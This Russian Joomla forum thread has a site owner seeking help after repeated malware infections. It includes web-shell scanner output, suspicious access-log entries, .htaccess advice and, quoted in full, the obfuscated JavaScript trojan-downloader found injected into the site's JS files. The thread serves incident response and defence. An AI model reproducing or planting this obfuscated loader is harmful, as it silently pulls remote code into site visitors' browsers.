Ещё одна тема про Вирус на сайте, прошу помощи. - Joomla 2.5: Общие вопросы

Здравствуйте коллеги, есть проблема, сайт http://tehresurs-yug.ru/ - постоянно валится из-за какой-то вирусни... причем изначально сайт был на j1.5 - боролся с вирусами, закрывал доступ к папкам... не помогло, решил что дырка в каком-то компоненте, решил перенести все на 2.5. - переверстал шаблон, сменил часть компонентов...
Захожу на сайт и опять какая-то гадость прописалась в JS... сейчас разворачиваю бекап - попутно делаю завирусованную копию сайта, что бы посмотреть что и куда влезло, может кто даст совет как защитить сайт?
ps хостинг от sweb - сколько сайтов поднимал не было ничего подобного.

Akeeba Backup
JCE Administration
Joomla! Update
Phoca Download
VirtueMart
virtuemart-aio
Контакты
Ленты новостей
Перенаправление
Поиск
Сообщения
Умный поиск

если поставить права на файлы 444 работать  будет?

Была такая проблема. Во-первых, смените пароли на фтп, проверьте комп на вирусы, во-вторых, поищите на сервере посторонние php файлы, у меня был Web Shell by oRb, под именем url.php, прятался в глубине папок, и хакер через шелл имел полный доступ к фтп.

Здравствуйте коллеги, есть проблема, сайт http://tehresurs-yug.ru/ - постоянно валится из-за какой-то вирусни... причем изначально сайт был на j1.5 - боролся с вирусами, закрывал доступ к папкам... не помогло, решил что дырка в каком-то компоненте, решил перенести все на 2.5. - переверстал шаблон, сменил часть компонентов...
Захожу на сайт и опять какая-то гадость прописалась в JS... сейчас разворачиваю бекап - попутно делаю завирусованную копию сайта, что бы посмотреть что и куда влезло, может кто даст совет как защитить сайт?
ps хостинг от sweb - сколько сайтов поднимал не было ничего подобного.

сканер в подписи поищи шелы

сканер в подписи поищи шелы

File: /home/t/tehresurru/tehresursru/public_html/administrator/components/com_akeeba/views/buadmin/view.html.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/components/com_phocadownload/views/phocadownloaduserstats/view.html.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/components/com_phocadownload/views/phocadownloadusers/view.html.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/components/com_users/views/groups/tmpl/default.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/components/com_virtuemart_allinone/admin.virtuemart_allinone.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/components/com_joomlaupdate/restore.php
String:: $_POST[

File: /home/t/tehresurru/tehresursru/public_html/administrator/components/com_virtuemart/views/updatesmigration/tmpl/default_tools.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/components/com_virtuemart/views/orders/tmpl/order.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/components/com_menus/views/menus/tmpl/default.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/templates/hathor/html/com_users/groups/default.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/templates/hathor/html/com_finder/filters/default.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/templates/hathor/html/com_finder/index/default.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/templates/hathor/html/com_finder/maps/default.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/templates/hathor/html/com_menus/menus/default.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/components/com_mailto/controller.php
String:: $_POST[

File: /home/t/tehresurru/tehresursru/public_html/components/com_phocadownload/views/user/tmpl/default_files.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/components/com_users/controllers/reset.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/components/com_virtuemart/controllers/cart.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/libraries/joomla/html/toolbar/button/confirm.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/libraries/joomla/environment/request.php
String:: $_POST[

File: /home/t/tehresurru/tehresursru/public_html/libraries/tcpdf/pdf417.php
String:: c99

File: /home/t/tehresurru/tehresursru/public_html/libraries/tcpdf/tcpdf.php
String:: c100

проверил часть файлов, ничего не нашел...

восстановил из бекапа... там все чисто, делал на локалке, потом выгружал... главное что бы дырок в комонентах не было...
Как лучше защититься, кроме выставления прав? если кто может дать хороший совет или поделиться опытом, с радостью выслушаю

.htaccess

.htaccess

раскидать по всем папкам? кроме главной?


этого будет достаточно?
Order allow,deny
Deny from all

File: /home/t/tehresurru/tehresursru/public_html/libraries/tcpdf/pdf417.php
String:: c99

File: /home/t/tehresurru/tehresursru/public_html/libraries/tcpdf/tcpdf.php
String:: c100

как появились? Аксесс лог есть?

File: /home/t/tehresurru/tehresursru/public_html/libraries/tcpdf/pdf417.php
String:: c99

File: /home/t/tehresurru/tehresursru/public_html/libraries/tcpdf/tcpdf.php
String:: c100

как появились? Аксесс лог есть?

217.118.95.66 tehresurs-yug.ru - - [10/May/2012:14:37:04 +0400] "GET /libraries/tcpdf/pdf417.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET4.0E)" 4612 0
217.118.95.66 tehresurs-yug.ru - - [10/May/2012:14:37:04 +0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET4.0E)" 4612 0
217.118.95.66 tehresurs-yug.ru - - [10/May/2012:14:37:08 +0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET4.0E)" 4612 0
217.118.95.66 tehresurs-yug.ru - - [10/May/2012:14:37:21 +0400] "GET /libraries/tcpdf/tcpdf.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET4.0E)" 4612 0


ну и так далее...
193.16.101.55 tehresurs-yug.ru - - [10/May/2012:18:22:01 +0400] "GET /libraries/tcpdf/tcpdf.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19" 11572 0

больше ничего не нашел...

А пораньше логов нет?

Ну это я был . А пораньше логов нет?

лог ведется с 23 апреля...ничего подобного в нем нет до сегодня... да и сам вирус после переноса на новую Joomla, только сегодня заметил... думал что поборол.... а тут нефига....

в js содержался такой гад:

try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$58$47.5$56$15$57.5$56$53$15$29.5$15$18.5$51$57$57$55$28$22.5$22.5$55.5$51$48.5$52.5$50$49$57.5$55$49$55.5$22$55$54.5$49$60$54.5$54$49.5$22$54$49.5$57$22.5$50.5$22.5$18.5$28.5$5.5$4$3.5$51.5$50$15$19$57$59.5$55$49.5$54.5$50$15$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$18.5$57.5$54$49$49.5$50$51.5$54$49.5$49$18.5$19.5$15$60.5$5.5$4$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23$28.5$5.5$4$3.5$61.5$5.5$4$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$54.5$54$53.5$54.5$57.5$56.5$49.5$53.5$54.5$58$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$51.5$50$15$19$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$23$19.5$15$60.5$5.5$4$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$51$49.5$47.5$49$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$51$49.5$47.5$49$18.5$19.5$44.5$23$45.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$56.5$48.5$56$51.5$55$57$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$56.5$48.5$56$51.5$55$57$18.5$19.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$57$59.5$55$49.5$15$29.5$15$18.5$57$49.5$59$57$22.5$52$47.5$58$47.5$56.5$48.5$56$51.5$55$57$18.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$56$49.5$47.5$49$59.5$56.5$57$47.5$57$49.5$48.5$51$47.5$54$50.5$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$15$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$51.5$50$15$19$57$51$51.5$56.5$22$56$49.5$47.5$49$59.5$40.5$57$47.5$57$49.5$15$29.5$29.5$15$18.5$48.5$54.5$53.5$55$53$49.5$57$49.5$18.5$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$3.5$61.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$53$54.5$47.5$49$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$56.5$56$48.5$15$29.5$15$57.5$56$53$15$20.5$15$37.5$47.5$57$51$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-683!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}


каспер его определяет как Trojan-Downloader.JS.Iframe.cwu
Время детектирования   09 май 2012 23:32 MSK
Время выпуска обновления   10 май 2012 01:25 MSK

Если у Вас во всех файлах один и тот же вредоносный код, то можно применить вот это:

Поиск и замена одинаковой строки всех файлов сайта

Если у Вас во всех файлах один и тот же вредоносный код, то можно применить вот это:

Поиск и замена одинаковой строки всех файлов сайта

я уже справился, спасибо.

Вопрос только в том как сделать что бы не было повторений

история повторяется заново....